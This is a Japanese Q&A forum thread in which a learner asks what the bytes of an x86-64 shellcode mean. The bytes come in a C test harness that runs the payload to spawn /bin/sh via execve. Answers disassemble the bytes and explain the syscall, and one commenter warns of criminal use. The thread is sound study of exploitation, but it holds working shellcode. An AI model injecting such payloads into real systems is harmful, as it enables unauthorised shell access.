Q&A
そのあたりを勉強するのが「コンピュータハイジャッキングという本」でなのでは?
絶対本に書いてあるはず。
コンピュータハイジャッキングという本でシェルコードについて勉強しているのですが、注入するプログラムの意味がわかりません。
例えば次のコード
#include <stdio.h> #include <string.h> char *shellcode = "\x48\x31\xd2\x52\x48\xb8\x2f\x62\x69\x6e\x2f\x2f\x73\x68" "\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x48\x8d\x42\x3b\x0f\x05"; int main(void) { fprintf(stdout,"Length: %d\n",strlen(shellcode)); (*(void(*)()) shellcode)(); return 0; }
変数 *shellcode を使って標的ホストでシェルを起動させるコードなのですが、実行はできたのですが、shellcodeに格納している16進数の意味がわかりません。
試しに"\x48\x31\xd2\x52\x48\xb8\x2f\x62\x69\x6e\x2f\x2f\x73\x68"を翻訳させてみると
H1ÒRH¸/bin//sh
と出てきました。/bin//shは分かるのですが、左の5文字の意味は何なのでしょうか?
他のコードでも翻訳すると意味がわからない文字列ばかりで、何をやっているのかわかりません。
これは適当な数字や文字を入れてるだけなのでしょうか?
何をやっているかって、”コンピュータハイジャッキング”という犯罪への準備です!
ここは、犯罪者を援助するためのサイトではありません!
判らないうちに、辞めておくべきです。
回答2件
0
ベストアンサー
シェルコードを逆アセンブルしてみます。
$ objdump -D -b binary -M intel,x86-64 -m i386 a.out a.out: ファイル形式 binary セクション .data の逆アセンブル: 00000000 <.data>: 0: 48 31 d2 xor rdx,rdx 3: 52 push rdx 4: 48 b8 2f 62 69 6e 2f movabs rax,0x68732f2f6e69622f b: 2f 73 68 e: 50 push rax f: 48 89 e7 mov rdi,rsp 12: 52 push rdx 13: 57 push rdi 14: 48 89 e6 mov rsi,rsp 17: 48 8d 42 3b lea rax,[rdx+0x3b] 1b: 0f 05 syscall
これを説明している記事を探してみましたら、以下が見つかりました。
x64でスタックバッファオーバーフローをやってみる - ももいろテクノロジー
コンピュータハイジャッキングには上記のような説明はなかったでしょうか?
投稿2020/11/26 13:52
総合スコア11705
0
text
1 0: 48 31 d2 xor %rdx,%rdx 2 3: 52 push %rdx 3 4: 48 b8 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rax 4 b: 2f 73 68 5 e: 50 push %rax 6 f: 48 89 e7 mov %rsp,%rdi 7 12: 52 push %rdx 8 13: 57 push %rdi 9 14: 48 89 e6 mov %rsp,%rsi 10 17: 8d 42 3b lea 0x3b(%rdx),%eax 11 1a: 0f 05 syscall
59(0x3b) の syscall は execve です。
参考になりますか?
投稿2020/11/26 13:32
編集2020/11/26 13:45
総合スコア8224
あなたの回答
tips
プレビュー
